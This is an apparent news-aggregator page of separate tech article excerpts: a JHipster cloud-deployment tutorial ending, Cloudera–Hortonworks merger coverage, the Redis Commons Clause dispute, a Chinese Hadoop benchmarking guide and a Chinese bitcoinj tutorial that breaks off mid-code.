    cf set-env $CF_APP_NAME FORCE_HTTPS true
    cf set-env $CF_APP_NAME SECURITY_OAUTH2_CLIENT_ACCESS_TOKEN_URI "$SECURITY_OAUTH2_CLIENT_ACCESS_TOKEN_URI"
    cf set-env $CF_APP_NAME SECURITY_OAUTH2_CLIENT_USER_AUTHORIZATION_URI "$SECURITY_OAUTH2_CLIENT_USER_AUTHORIZATION_URI"
    cf set-env $CF_APP_NAME SECURITY_OAUTH2_RESOURCE_USER_INFO_URI "$SECURITY_OAUTH2_RESOURCE_USER_INFO_URI"
    cf set-env $CF_APP_NAME SECURITY_OAUTH2_CLIENT_CLIENT_ID "$SECURITY_OAUTH2_CLIENT_CLIENT_ID"
    cf set-env $CF_APP_NAME SECURITY_OAUTH2_CLIENT_CLIENT_SECRET "$SECURITY_OAUTH2_CLIENT_CLIENT_SECRET"
    cf restage healthpoints

    After overriding the default OIDC settings for Spring Security, you’ll need to add https://healthpoints.cfapps.io/login as a redirect URI in your Okta OIDC application.

    Then…​ you’ll be able to authenticate. Voila! 😃

    JHipster API on Cloud Foundry

    Modify your React Native application’s apiUrl (in App/Config/AppConfig.js) to be https://healthpoints.cfapps.io/ and deploy it to your phone. Hint: use the "running on device" docs I mentioned earlier.

    export default {
      apiUrl: 'https://healthpoints.cfapps.io/',
      appUrlScheme: 'healthpoints'
    }

    I used Xcode on my Mac (open react-native-app/ios/HealthPoints.xcodeproj) and deployed it to an iPhone X.

    When I encountered build issues in Xcode, I ran rm -rf ~/.rncache and it fixed them. I also used a bit of rm -rf node_modules && yarn.

    Below are screenshots that show it worked!

    Login and Entities on iPhone X

    Deploy Your Spring Boot API to Google Cloud Platform using Kubernetes

    JHipster also supports deploying your app to the 🔥 hottest thing in production: Kubernetes!

    To try it out, create a k8s directory alongside your jhipster-api directory. Then run jhipster kubernetes in it. When prompted, specify the following answers:

    • Type of application: Monolithic application

    • Root directory: ../

    • Which applications: jhipster-api

    • Setup monitoring: No

    • Kubernetes namespace: default

              Hortonworks Cloudera merger proposal stirs market pot      Cache   Translate Page      

    Cloudera was first to market in 2008, and Hortonworks followed in 2011. In a recent interview with Computer Weekly, Rob Beardon, CEO and co-founder of Hortonworks, said the company’s software had always been about the business value to be derived from bringing unstructured, big data under management and less about Hadoop, as such.

    “Back in 2011, our intuition was that all the ‘new paradigm’ data sets the mobile, the click stream, the sensor data was all coming at enterprises very quickly, and in large volumes. Architecturally, that data would not go into relational environments.

    “Also, it was data about [companies’] customers, products and suppliers that was pre-transaction or pre-event. Our hypothesis was if we could bring that data under management, and learn how to get value from it, we could transform business models to be less reactionary post event, post transaction and more proactive pre-event, pre-transaction. And we thought that Hadoop had the best shot of being the platform that would do that.”

    In another recent interview with Computer Weekly, Amy O’Connor, chief data and information officerat Cloudera, said that when she was a customer at Nokia, she had been impressed that the company’s foundersAmr Awadallah and Mike Olsen said that all companies should be able to transform their businesses with new ways of treating data, not just the likes of Yahoo or Google.

    In yesterday’s merger statement, Tom Reilly, chief executive officerat Cloudera, said, presenting the two suppliers as complementary: “By bringing together Hortonworks’ investments in end-to-end data management with Cloudera’s investments in data warehousing and machine learning, we will deliver the industry’s first enterprise data cloud from the edge to AI.”

    Matt Aslett, analyst at 451 Research, said of the proposed merger in a comment provided to Computer Weekly: “There shouldn’t be significant overlap in terms of customers. While many companies might have both Cloudera and Hortonworks distributions running tactical deployments, in terms of strategic adoption, most organisations have chosen one or the other, and there is a commitment from Cloudera that customers will be supported on current offerings for at least three years.

    “While there is a common foundation of Apache Hadoop and associated open source projects, the two companies do have some differentiating functionality and Cloudera clearly sees opportunities to sellHortonworks DataFlow (HDF) to Cloudera customers for streaming analytics and Cloudera Data Science Workbench to Hortonworks clients for machine learning and AI,” he said.

    “There is also significant overlap in some areas, particularly data management, data governance and data security. In relation to overlapping products, Cloudera has said that the combined engineering teams will identify the best and merge them where appropriate. This is likely to be a lot easier said than done, and could be a major hurdle to the company realising its potential R&D cost savings if not managed effectively.

    “If the leadership and engineering teams of the combined company are able to put aside their historically sometimes acrimonious differences to successfully rationalise the merged product portfolio, the result should be positive for customers overall. It will potentially involve a reduction in choice, it’s true, but given the proliferation of competing projects from Cloudera and Hortonworks in recent years, that may not be a bad thing.”

    Doug Henschen, an analyst at Constellation Research said, in a comment provided to our sister site SearchDataMangement.com : “The move to the cloud by enterprises is sapping growth and revenue potential for Cloudera and Hortonworks such that both players can’t sustain strong and profitable growth. Amazon EMR and Spark services, and similar Azure and Google services, are seeing faster growth, and, together, are capturing the lion’s share of the big data platforms market.”


              Redis Labs and Common Clause attacked where it hurts: With open-source code      Cache   Translate Page      

    After Redis Labs added a new license clause, Commons Clause , on top of popular open-source, in-memory data structure store Redis , open-source developers were mad as hell . Now, instead of just ranting about it, some have counterattacked by starting a project, GoodFORM , to fork the code in question.

    Also: Why Redis Labs made a huge mistake when it changed its open source strategy TechRepublic

    The two developers behind this, Chris Lamb, the Debian linux project leader, and Nathan Scott, a Fedora developer, explained:

    "With the recent licensing changes to several Redis Labs modules making them no longer free and open source, GNU/Linux distributions such as Debian and Fedora are no longer able to ship Redis Labs' versions of the affected modules to their users.

    As a result, we have begun working together to create a set of module repositories forked from prior to the license change. We will maintain changes to these modules under their original open-source licenses, applying only free and open fixes and updates."

    They're looking for help with this project.

    The Common Clause sub-license forbids you from selling software it covers. It also states you may not host or offer consulting or support services as "a product or service whose value derives, entirely or substantially, from the functionality of the software." This is expressly designed to prevent cloud companies from profiting by using the licensed programs.

    As Redis Labs' co-founder and CTO Yiftach Shoolman said in an email, the company did this "for two reasons -- to limit the monetization of these advanced capabilities by cloud service providers like AWS and to help enterprise developers whose companies do not work with AGPL licenses."

    Be that as it may, Bruce Perens, co-founder of the Open Source Initiative (OSI) , thinks Redis Labs could have handled it better. Perens wrote, "Once the Commons Clause is added , it's no longer the Apache license, and calling it so confuses people about what is Open Source and what isn't. ... Stop it."

    Also: Why novelty open source licenses hurt businesses more than they help TechRepublic

    Lamb added in an e-mail that Redis Labs' use of the Common Clause made it impossible to use their programs. Thus, their forked replacements under the old license. "We are committed to making these available under an open-source license permanently, and welcome community involvement."

    Victor Ruiz, a developer who'd worked on Redis, tweeted, "After using open source contributions to make the projects good enough, now they want to cash out. Let's keep free and open Redis modules."

    In an e-mail Ruiz expanded:

    "Their behaviour seems unethical also to me. They are now selling licenses of their software which includes open-source contributions.They have used the open-source contributions to make these modules good enough and now they will cash out. And I bet they knew, many people wouldn't have contributed if they had this Common Clause from the beginning." He understands that they're trying to stop SaaS [Software-as-a-Service] companies to sell software which uses their modules, but wonder if there aren't other types of licenses which might fit better in this scenario."

    Also: Mozilla's open-source move 20 years ago helped rewrite rules of tech CNET

    Ruiz also added that prior to announcing its moving some of its code under the Common Clause. Redis Labs had asked him to sign a Contributor License Agreement (CLA), which granted the copyrights and patent rights of their contributions to Redis Labs.

    Ruiz commented, "It seems such a great coincidence that they introduced the clause in the CLA right after ensuring they have all the rights on the contributions made to the projects, ensuring that anybody can claim for rights on that software."

    The struggle between open-source developers and Common Clause adopters is on.


              Cloudera 2.0: Cloudera and Hortonworks Merge to form a Big Data Super Power      Cache   Translate Page      

    We’ve all dreamed of going to bed one day and waking up the next with superpowers stronger, faster and with maybe the ability to fly. Yesterday that is exactly what happened to Tom Reilly and the people at Cloudera and Hortonworks . On October 2 nd they went to bed as two rivals vying for leadership in the big data space. In the morning they woke up as Cloudera 2.0, a $700M firm, with a clear leadership position. “ From the edge to AI ”…to infinity and beyond! The acquisition has made them bigger, stronger and faster.


    Cloudera 2.0: Cloudera and Hortonworks Merge to form a Big Data Super Power

    Like any good movie, however, the drama is just getting started, innovation in the cloud, big data, IoT and machine learning is simply exploding, transforming our world over and over, faster and faster. And of course, there are strong villains, new emerging threats and a host of frenemies to navigate.

    What’s in Store Cloudera 2.0

    Overall, this is great news for customers, the Hadoop ecosystem and the future of the market. Both company’s customers can now sleep at night knowing that the pace of innovation from Cloudera 2.0 will continue and accelerate. Combining the Cloudera and Hortonworks technologies means that instead of having to pick one stack or the other, now customers can have the best of both worlds. The statement from their press release “From the Edge to AI” really sums up how complementary some of the investments that Hortonworks made in IoT complement Cloudera’s investments in machine learning. From an ecosystem and innovation perspective, we’ll see fewer competing Apache projects with much stronger investments. This can only mean better experiences for any user of big data open source technologies.

    At the same time, it’s no secret how much our world is changing with innovation coming in so many shapes and sizes. This is the world that Cloudera 2.0 must navigate. Today, winning in the cloud is quite simply a matter of survival. That is just as true for the new Cloudera as it is for every single company in every industry in the world. The difference is that Cloudera will be competing with a wide range of cloud-native companies both big and small that are experiencing explosive growth. Carving out their place in this emerging world will be critical.

    The company has so many of the right pieces including connectivity, computing, and machine learning. Their challenge will be, making all of it simple to adopt in the cloud while continuing to generate business outcomes. Today we are seeing strong growth from cloud data warehouses likeAmazon Redshift, Snowflake , Azure SQL Data Warehouse andGoogle Big Query. Apache Spark and service players like Databricks and Qubole are also seeing strong growth. Cloudera now has decisions to make on how they approach this ecosystem and they choose to compete with and who they choose to complement.

    What’s In Store for the Cloud Players

    For the cloud platforms like AWS, Azure, and Google, this recent merger is also a win. The better the cloud services are that run on their platforms, the more benefits joint customers will get and the more they will grow their usage of these cloud platforms. There is obviously a question of who will win, for example, EMR, Databricks or Cloudera 2.0, but at the end of the day the major cloud players will win either way as more and more data, and more and more insight runs through the cloud.

    Talend’s Take

    From a Talend perspective, this recent move is great news. At Talend, we are helping our customers modernize their data stacks. Talend helps stitch together data, computing platforms, databases, machine learning services to shorten the time to insight.

    Ultimately, we are excited to partner with Cloudera to help customers around the world leverage this new union. For our customers, this partnership means a greater level of alignment for product roadmaps and more tightly integrated products. Also, as the rate of innovation accelerates from Cloudera, our support for what we call “dynamic distributions” means that customers will be able to instantly adopt that innovation even without upgrading Talend. For Talend, this type of acquisition also reinforces the value of having portable data integration pipelines that can be built for one technology stack and can then quickly move to other stacks. For Talend and Cloudera 2.0 customers, this means that as they move to the future, unified Cloudera platform, it will be seamless for them to adopt the latest technology regardless of whether they were originally Cloudera or Hortonworks customers.

    You have to hand it to Tom Reilly and the teams at both Hortonworks and Cloudera. They’ve given themselves a much stronger position to compete in the market at a time when people saw their positions in the market eroding. It’s going to be really interesting to see what they do with the projected $125 million in annualized cost savings. They will have a lot of dry powder to invest in or acquire innovation. They are going to have a breadth in offerings, expertise and customer base that will allow them to do things that no one else in the market can do.


              Hadoop 集群基准测试      Cache   Translate Page      

    生产环境中,如何对 Hadoop 集群进行 Benchmark Test?如何进行服务所需的机器选型?如何快速对比出不同集群的性能?

    本文将通过 Hadoop 自带的 Benchmark 测试程序:TestDFSIO 和 TeraSort,简单介绍如何进行 Hadoop 的读写 & 计算性能的压测。

    回顾上篇文章: 认识多队列网卡中断绑定

    (本文使用 2.6.0 的 hadoop 版本进行测试,基准测试被打包在测试程序 JAR 文件中,通过无参调用 bin/hadoop jar ./share/hadoop/mapreduce/xxx.jar 可以得到其列表)

    使用 TestDFSIO 进行集群的 I/O 性能测试处

    TestDFSIO :

    org.apache.hadoop.fs.TestDFSIO

    TestDFSIO 程序原理:

    使用多个 Map Task 模拟多路的并发读写。通过自己的 Mapper class 用来读写数据,生成统计信息;通过自己的 Reduce Class 来收集并汇总各个 Map Task 的统计信息, 主要涉及到三个文件: AccumulatingReducer.java, IOMapperBase.java, TestDFSIO.java。

    TestDFSIO 大致运行过程:

    根据 Map Task 的数量将相应个数的 Control 控制文件写入 HDFS,这些控制文件仅包含一行内容:<数据文件名,数据文件大小> ;

    启动 MapReduceJob,IOMapperBase Class 中的 Map 方法将 Control 文件作为输入文件,读取内容,将数据文件名和大小作为参数传递给自定义的 doIO 函数,进行实际的数据读写工作。而后将数据大小和 doIO 执行的时间传递给自定义的 collectStatus 函数,进行统计数据的输出工作 ;

    doIO 的实现:TestDFSIO 重载并实现 doIO 函数,将指定大小的数据写入 HDFS 文件系统;

    collectStatus 的实现:TestDFSIO 重载并实现 collectStatus 函数,将任务数量,以及数据大小,完成时间等相关数据作为 Map Class 的结果输出;

    统计数据用不同的前缀标识,例如 l: (stand for long), s: (stand for string) etc;

    执行唯一的一个 Reduce 任务,收集各个 Map Class 的统计数据,使用 AccumulatingReducer 进行汇总统计;

    最后当 MapReduceJob 完成以后,调用 analyzeResult 函数读取最终的统计数据并输出到控制台和本地的 Log 文件中;

    那么 MR 任务测试集群读写性能是否会因为数据传输影响到结果判断呢?

    可以看整个过程中,实际通过 MR 框架进行读写 Shuffle 的只是 Control 文件,数据量非常小,所以 MR 框架本身的数据传输对测试的影响很小,可以忽略不计,测试结果基本是取决于 HDFS 的读写性能的。

    了解到原理后,我们将运行 TestDFSIO 进行测试

    测试集群版本:hadoop-2.6.0-mdh3.11

    测试集群的机器情况:5 个 slave(dn/nm) 节点,每个节点机器为 32 核,128g 内存,12*4THdd 磁盘的物理机。

    测试数据:5 个文件,每个文件大小为 1TB。

    环境要求:集群保证完全空闲,无其他干扰任务。

    1. 写测试:

    bin/hadoop jar ./share/hadoop/mapreduce/hadoop-mapreduce-client-jobclient-2.6.0-mdh3.11-jre8-SNAPSHOT.jar TestDFSIO -write -nrFiles 5 -size 1TB # 查看测试结果 cat TestDFSIO_results.log ----- TestDFSIO ----- : write Date & time: Mon Jun 04 16:44:25 CST 2018 Number of files: 5 Total MBytes processed: 5242880.0 Throughput mb/sec: 213.10459447844454 Average IO rate mb/sec: 213.11135864257812 IO rate std deviation: 1.1965074234796487 Test exec time sec: 4972.91

    2. 读测试:

    bin/hadoop jar ./share/hadoop/mapreduce/hadoop-mapreduce-client-jobclient-2.6.0-mdh3.11-jre8-SNAPSHOT.jar TestDFSIO -read -nrFiles 5 -size 1TB # 查看测试结果 cat TestDFSIO_results.log ----- TestDFSIO ----- : read Date & time: Mon Jun 04 18:48:48 CST 2018 Number of files: 5 Total MBytes processed: 5242880.0 Throughput mb/sec: 164.327389903222 Average IO rate mb/sec: 164.33087158203125 IO rate std deviation: 0.7560928117328837 Test exec time sec: 6436.246

    以上测试数据解释:

    Throughput mb/sec和 Average IO rate mb/sec 是两个最重要的性能衡量指标:Throughput mb/sec 衡量每个 map task 的平均吞吐量,Average IO rate mb/sec 衡量每个文件的平均 IO 速度。

    IO rate std deviation:标准差,高标准差表示数据散布在一个大的值域中,这可能意味着群集中某个节点存在性能相关的问题,这可能和硬件或软件有关。

    使用 TeraSort 进行集群的计算性能测试

    TeraSort: org.apache.hadoop.examples.terasort.TeraSort

    TeraSort 程序原理:

    对输入文件按 Key 进行全局排序。TeraSort 针对的是大批量的数据,在实现过程中为了保证 Reduce 阶段各个 Reduce Job 的负载平衡,以保证全局运算的速度,TeraSort 对数据进行了预采样分析。

    TeraSort 大致运行过程:

    从 job 框架上看,为了保证 Reduce 阶段的负载平衡,使用 jobConf.setPartitionerClass 自定义了 Partitioner Class 用来对数据进行分区,在 map 和 reduce 阶段对数据不做额外处理。Job 流程如下:

    对数据进行分段采样:例如将输入文件最多分割为 10 段,每段读取最多 100,000 行数据作为样本,统计各个 Key 值出现的频率并对 Key 值使用内建的 QuickSort 进行快速排序(这一步是 JobClient 在单个节点上执行的,采样的运算量不能太大);

    将样本统计结果中位于样本统计平均分段处的 Key 值(例如 n/10 处 n=[1..10])做为分区的依据以 DistributedCache 的方式写入文件,这样在 MapReduce 阶段的各个节点都能够 Access 这个文件。如果全局数据的 Key 值分布与样本类似的话,这也就代表了全局数据的平均分区的位置;

    在 MapReduceJob 执行过程中,自定义的 Partitioner 会读取这个样本统计文件,根据分区边界 Key 值创建一个两级的索引树用来快速定位特定 Key 值对应的分区(这个两级索引树是根据 TeraSort 规定的输入数据的特点定制的,对普通数据不一定具有普遍适用性,比如 Hadoop 内置的 TotalPartitioner 就采用了更通用的二分查找法来定位分区);

    总结:

    TeraSort 使用了 Hadoop 默认的 IdentityMapper 和 IdentityReducer。IdentityMapper 和 IdentityReducer 对它们的输入不做任何处理,将输入 k,v 直接输出;也就是说是完全是为了走框架的流程而空跑。这正是 Hadoop 的 TeraSort 的巧妙所在,它没有为排序而实现自己的 mapper 和 reducer,而是完全利用 Hadoop 的 Map Reduce 框架内的机制实现了排序。 而也正因为如此,我们可以在集群上利用 TeraSort 来测试 Hadoop。

    了解到原理后,我们将运行 TeraSort 进行测试

    测试集群版本:hadoop-2.6.0-mdh3.11

    测试集群的机器情况:

    5 个 slave(dn/nm) 节点,每个节点机器为 32 核,128g 内存,12*4THdd 磁盘的物理机。

    测试数据:

    hadoop 自带的生成数据工具 TeraGen,输入文件是由一行行 100 字节的记录组成,每行记录包括一个 10 字节的 Key;以 Key 来对记录排序。

    环境要求:

    集群保证完全空闲,无其他干扰任务。

    1

    测试数据生成

    按照 SortBenchmark 要求的输入数据规则(需要 gensort 工具生成输入数据):输入文件是由一行行 100 字节的记录组成,每行记录包括一个 10 字节的 Key;以 Key 来对记录排序。 (具体可参考http://www.ordinal.com/gensort.html)

    Hadoop 的 TeraSort 实现的生成数据工具 TeraGen,算法与 gensort 一致,我们将使用 TeraGen 生成测试数据:

    (测试数据量为 1T,由于 100 字节一行,则设定行数为 10000000000)

    bin/hadoop jar ./share/hadoop/mapreduce/hadoop-mapreduce-examples-2.6.0-mdh3.11-jre8-SNAPSHOT.jar teragen 10000000000 /terasort/input1TB File System Counters FILE: Number of bytes read=0 FILE: Number of bytes written=248548 FILE: Number of read operations=0 FILE: Number of large read operations=0 FILE: Number of write operations=0 HDFS: Number of bytes read=173 HDFS: Number of bytes written=1000000000000 HDFS: Number of read operations=8 HDFS: Number of large read operations=0 HDFS: Number of write operations=4 Job Counters Launched map tasks=2 Other local map tasks=2 Total time spent by all maps in occupied slots (ms)=32792925 Total time spent by all reduces in occupied slots (ms)=0 Total time spent by all map tasks (ms)=10930975 Total vcore-seconds taken by all map tasks=10930975 Total megabyte-seconds taken by all map tasks=8394988800 Map-Reduce Framework Map input records=10000000000 Map output records=10000000000 Input split bytes=173 Spilled Records=0 Failed Shuffles=0 Merged Map outputs=0 GC time elapsed (ms)=193112 CPU time spent (ms)=14325820 Physical memory (bytes) snapshot=916639744 Virtual memory (bytes) snapshot=12308406272 Total committed heap usage (bytes)=712507392 HeapUsageGroup HeapUsageCounter=30947608 org.apache.hadoop.examples.terasort.TeraGen$Counters CHECKSUM=3028416809717741100 File Input Format Counters Bytes Read=0 File Output Format Counters Bytes Written=1000000000000 # 查看生成的数据 bin/hadoop dfs -ls /terasort/input1TB Found 3 items -rw-r--r-- 3 hdfs_admin supergroup 0 2018-06-05 11:49 /terasort/input1TB/_SUCCESS -rw-r--r-- 3 hdfs_admin supergroup 500000000000 2018-06-05 11:45 /terasort/input1TB/part-m-00000 -rw-r--r-- 3 hdfs_admin supergroup 500000000000 2018-06-05 11:49 /terasort/input1TB/part-m-00001

    2

    运行 TeraSort 测试程序

    测试数据生成好后,我们将 运行 TeraSort 测试程序:

    bin/hadoop jar ./share/hadoop/mapreduce/hadoop-mapreduce-examples-2.6.0-mdh3.11-jre8-SNAPSHOT.jar terasort /terasort/input1TB
              java开发比特币类库bitcoinj入门指南      Cache   Translate Page      

    bitcoinj是一个使用比特币协议的库。它可以维护钱包,发送/接收交易而无需比特币核心的本地副本,并具有许多其他高级功能。它是用Java实现的,但可以通过任何JVM兼容语言中使用:包括Python和JavaScript中的示例。

    它附带完整的文档,并建立了许多大型,众所周知的比特币应用程序和服务。下面我们来看看如何使用它。

    初始设置

    bitcoinj内置了日志记录和断言。无论是否指定了-ea标志,都会默认检查断言。记录由SLF4J库处理。它允许你选择你更喜欢使用的日志系统,例如JDK日志记录,Android日志记录等。默认情况下,我们使用简单的logger来打印stderr感兴趣的大部分内容。你可以通过切换lib目录中的jar文件来选择一个新的logger。

    bitcoinj使用Maven作为其构建系统,并通过git分发。你可以使用源代码/ jar下载,但直接从源存储库获取它更安全。

    要获取代码并安装它,请抓取MavenGradle,并将其添加到你的路径中。还要确保安装了git。可能你的Java IDE也有一些Maven/Gradle和Git集成,但是通过命令行使用它们还是非常有用。

    现在获取最新版本的代码。你可以使用使用Maven使用Gradle页面上的说明——只需在那里运行命令,你就可以获得正确的代码版本(除非此网站本身已被泄露)。这是为了防止受损镜像或源代码下载——因为git使用源树哈希工作,如果以正确的方式获得源哈希,则可以保证最终得到正确的代码。

    你可以在这里阅读完整的程序。

    基本结构

    bitcoinj应用程序使用以下对象:

    • NetworkParameters实例,用于选择你所在的网络(生产或测试)。
    • 用于存储ECKeys和其他数据的Wallet实例。
    • 用于管理网络连接的PeerGroup实例。
    • 一个BlockChain实例,它管理共享的全局数据结构,使比特币工作。
    • 一个BlockStore实例,它将块链数据结构保存在某个位置,就像在磁盘上一样。
    • WalletEventListener实现,用于接收钱包交易。

    为了简化设置,还有一个WalletAppKit对象可以创建上述对象并将它们连接在一起。虽然可以手动执行此操作(对于大多数“真实”应用程序),但此演示应用程序会显示如何使用应用程序工具包。

    让我们看看代码,看看它是如何工作的。

    设置

    我们使用实用程序函数将log4j配置为具有更紧凑,更简洁的日志格式。然后我们检查命令行参数。

    BriefLogFormatter.init();
    if (args.length < 2) {
        System.err.println("Usage: address-to-send-back-to [regtest|testnet]");
        return;
    }

    然后我们根据可选的命令行参数选择我们将要使用的网络:

    // Figure out which network we should connect to. Each one gets its own set of files.
    NetworkParameters params;
    String filePrefix;
    if (args[1].equals("testnet")) {
        params = TestNet3Params.get();
        filePrefix = "forwarding-service-testnet";
    } else if (args[1].equals("regtest")) {
        params = RegTestParams.get();
        filePrefix = "forwarding-service-regtest";
    } else {
        params = MainNetParams.get();
        filePrefix = "forwarding-service";
    }

    有多个独立的,独立的比特币网络:

    • 人们买卖东西的主要或“生产”网络。
    • 公共测试网络(testnet)不时被重置并存在以供我们使用新功能。
    • 回归测试模式,它不是公共网络,需要你自己运行带有-regtest标志的比特币守护进程。

    每个网络都有自己的创世块,自己的端口号和自己的地址前缀字节,以防止你不小心尝试通过网络发送比特币(这将无法正常工作)。这些事实被封装到NetworkParameters单例对象中。如你所见,每个网络都有自己的类,你可以通过在其中一个对象上调用get()来获取相关的NetworkParameters对象。

    强烈建议你在testnet上或使用regtest模式开发软件。如果你不小心丢失了测试比特币,这没什么大不了的,因为它们毫无价值,你可以从TestNet Faucet免费获得大量的比特币。确保在完成后将比特币送回水龙头,以便其他人也可以使用它们。

    在regtest模式下,没有公共基础设施,但是你可以随时获得一个新的块而不必等待一个通过在regtest模式bitcoind运行的同一台机器上运行bitcoind -regtest setgenerate true

    密钥和地址

    比特币交易通常将钱汇入公共椭圆曲线键。发件人创建包含收件人地址的交易,其中地址是其公钥哈希的编码形式。接收者然后签署一个交易,用他们自己的私钥声明比特币。密钥用ECKey类表示。ECKey可以包含私钥,或只包含缺少私有部分的公钥。请注意,在椭圆曲线加密中,公钥是从私钥派生的,因此知道私钥本身也意味着知道公钥。这与你可能熟悉的其他一些加密系统不同,例如RSA。

    地址是公钥的文本编码。实际上,它是公钥的160位hash,具有版本字节和一些校验和字节,使用名为base58的比特币特定编码编码到文本中。Base58旨在避免在写下时可能相互混淆的字母和数字,例如1和大写i。

    // Parse the address given as the first parameter.
    forwardingAddress = new Address(params, args[0]);

    由于地址对要为其使用密钥的网络进行编码,因此我们需要在此处传递网络参数。第二个参数只是用户提供的字符串。如果构造函数不可解析或者网络错误,它将抛出钱包应用套件例外。

    bitcoinj由各种层组成,每层都在比最后一层更低的层次上运行。想要发送和接收资金的典型应用程序至少需要BlockChainBlockStorePeerGroupWallet。所有这些对象需要相互连接,以便数据正确流动。阅读如何融合在一起,了解有关数据如何通过基于bitcoinj的应用程序流动的更多信息。

    为了简化这个过程(通常是样板文件),我们提供了一个名为WalletAppKit的高级打包器。它在简化的支付验证模式(而不是完全验证)中配置bitcoinj,这是此时选择的最合适的模式。除非你是专家并且希望尝试(不完整的,可能是错误的)完整模式,它提供了一些简单的属性和钩子,允许你修改默认配置。

    将来,可能会有更多的工具包为不同类型的应用程序配置bitcoinj,这些应用程序可能有不同的需求。但就目前而言,只有一个。

    // Start up a basic app using a class that automates some boilerplate. Ensure we always have at least one key.
    kit = new WalletAppKit(params, new File("."), filePrefix) {
        @Override
        protected void onSetupCompleted() {
            // This is called in a background thread after startAndWait is called, as setting up various objects
            // can do disk and network IO that may cause UI jank/stuttering in wallet apps if it were to be done
            // on the main thread.
            if (wallet().getKeyChainGroupSize() < 1)
                wallet().importKey(new ECKey());
        }
    };
    
    if (params == RegTestParams.get()) {
        // Regression test mode is designed for testing and development only, so there's no public network for it.
        // If you pick this mode, you're expected to be running a local "bitcoind -regtest" instance.
        kit.connectToLocalHost();
    }
    
    // Download the block chain and wait until it's done.
    kit.startAsync();
    kit.awaitRunning();

    该工具包有三个参数 - NetworkParameters(几乎所有库中的API都需要这个),一个用于存储文件的目录,以及一个以任何创建文件为前缀的可选字符串。如果你希望保持分隔的同一目录中有多个不同的bitcoinj应用程序,这将非常有用。在这种情况下,文件前缀是“forwarding-service”加上网络名称,如果不是主网络(参见上面的代码)。

    它还提供了一个可覆盖的方法,我们可以将自己的代码放入其中,以自定义它为我们创建的对象。我们在这里覆盖它。请注意,appkit实际上将在后台线程上创建和设置对象,因此也会从后台线程调用onSetupCompleted。

    在这里,我们只需检查钱包是否至少有一个密钥,如果没有,我们会添加一个新密钥。如果我们从磁盘加载钱包,那么当然不会采用此代码路径。

    接下来,我们检查我们是否使用regtest模式。如果我们是,那么我们告诉套件只连接到本地主机,其中预计会在regtest模式下运行bitcoind。

    最后,我们调用kit.startAsync()。 WalletAppKit是一种番石榴服务。 Guava是Google广泛使用的实用程序库,它增加了标准Java库以及一些有用的附加功能。服务是一个可以启动和停止的对象(但只能启动一次),并且可以在完成启动或关闭时接收回调。你也可以阻止调用线程,直到它以awaitRunning()启动,这就是我们在这里所做的。

    当块链完全同步时,WalletAppKit将认为自己已经启动,这有时需要一段时间。你可以了解如何加快速度,但对于玩具演示应用程序,不需要实现任何额外的优化。

    该工具包上有访问器,可以访问它配置的底层对象。在类启动或启动过程之前,你不能调用它们(它们将断言),因为不会创建对象。

    应用程序启动后,你会注意到应用程序运行的目录中有两个文件:.wallet文件和.spvchain文件。他们走在一起,决不能分开。

    处理交易

    我们想知道什么时候收到钱,所以我们可以转发它。这是一个交易,与bitcoinj中的大多数Java API一样,你通过注册事件侦听器event listeners来了解交易,事件侦听器只是实现接口的对象。库中有一些交易监听器接口:

    • WalletEventListener:用于发生在钱包中的事情。
    • BlockChainListener:用于与块链相关的交易。
    • PeerEventListener:用于与网络中的对等方相关的交易。
    • TransactionConfidence.Listener:用于与交易具有的回滚安全级别相关的交易。

    大多数应用程序不需要使用所有这些。因为每个接口都提供一组相关交易,你可能并不关心所有这些交易。

    kit.wallet().addCoinsReceivedEventListener(new WalletCoinsReceivedEventListener() {
        @Override
        public void onCoinsReceived(Wallet w, Transaction tx, Coin prevBalance, Coin newBalance) {
            // Runs in the dedicated "user thread".
        }
    });

    bitcoinj中的交易在专用的后台线程中运行,该线程仅用于运行事件侦听器,称为user thread用户线程。这意味着它可以与应用程序中的其他代码并行运行,如果你正在编写GUI应用程序,则意味着你不能直接修改GUI,因为你不在GUI或main主线程中。但是,事件侦听器本身不需要是线程安全的,因为交易将按顺序排队并执行。你也不必担心使用多线程库时通常会出现的许多其他问题(例如,重新进入库是安全的,并且可以安全地执行阻塞操作)。

    关于编写GUI应用程序的说明

    大多数小工具工具包(如Swing,JavaFX或Android)都具有所谓的线程关联,这意味着你只能在单个线程中使用它们。要从后台线程返回到主线程,通常会将闭包传递给某个实用程序函数,该函数调度在GUI线程空闲时运行的闭包。

    为了简化使用bitcoinj编写GUI应用程序的任务,你可以在注册事件侦听器listener时指定任意Executor。将要求该执行程序运行事件侦听器。默认情况下,这意味着将给定的Runnable传递给用户线程,但你可以像这样覆盖:

    Executor runInUIThread = new Executor() {
        @Override public void execute(Runnable runnable) {
            SwingUtilities.invokeLater(runnable);   // For Swing.
            Platform.runLater(runnable);   // For JavaFX.
    
            // For Android: handler was created in an Activity.onCreate method.
            handler.post(runnable);  
        }
    };
    
    kit.wallet().addEventListener(listener, runInUIThread);11

    现在,listener上的方法将自动在UI线程中调用。

    因为这可能会重复且烦人,你还可以更改默认执行程序,因此所有交易始终在你的UI线程上运行:

    Threading.USER_THREAD = runInUIThread;

    在某些情况下,bitcoinj可以非常快速地生成大量交易,这在将块链与具有大量交易的钱包同步时是典型的,因为每个交易都可以生成交易可信度confidence更改交易(因为它们隐藏的很深)。未来钱包交易的工作方式很可能会改变以避免这个问题,但是现在这就是API的工作方式。如果用户线程落后,则当事件侦听器listener调用在堆上排队时,可能会发生内存膨胀。为避免这种情况,你可以使用Threading.SAME_THREAD作为执行程序注册交易处理程序,在这种情况下,它们将立即在bitcoinj控制的后台线程上运行。但是,在使用此模式时必须格外小心——代码中出现的任何异常都可能会解开bitcoinj堆栈并导致对等断开连接,同样,重新进入库可能会导致锁定反转或其他问题。通常你应该避免这样做,除非你真的需要额外的表现,并确切知道你在做什么。

    收钱

    kit.wallet().addCoinsReceivedEventListener(new WalletCoinsReceivedEventListener() {
        @Override
        public void onCoinsReceived(Wallet w, Transaction tx, Coin prevBalance, Coin newBalance) {
            // Runs in the dedicated "user thread".
            //
            // The transaction "tx" can either be pending, or included into a block (we didn't see the broadcast).
            Coin value = tx.getValueSentToMe(w);
            System.out.println("Received tx for " + value.toFriendlyString() + ": " + tx);
            System.out.println("Transaction will be forwarded after it confirms.");
            // Wait until it's made it into the block chain (may run immediately if it's already there).
            //
            // For this dummy app of course, we could just forward the unconfirmed transaction. If it were
            // to be double spent, no harm done. Wallet.allowSpendingUnconfirmedTransactions() would have to
            // be called in onSetupCompleted() above. But we don't do that here to demonstrate the more common
            // case of waiting for a block.
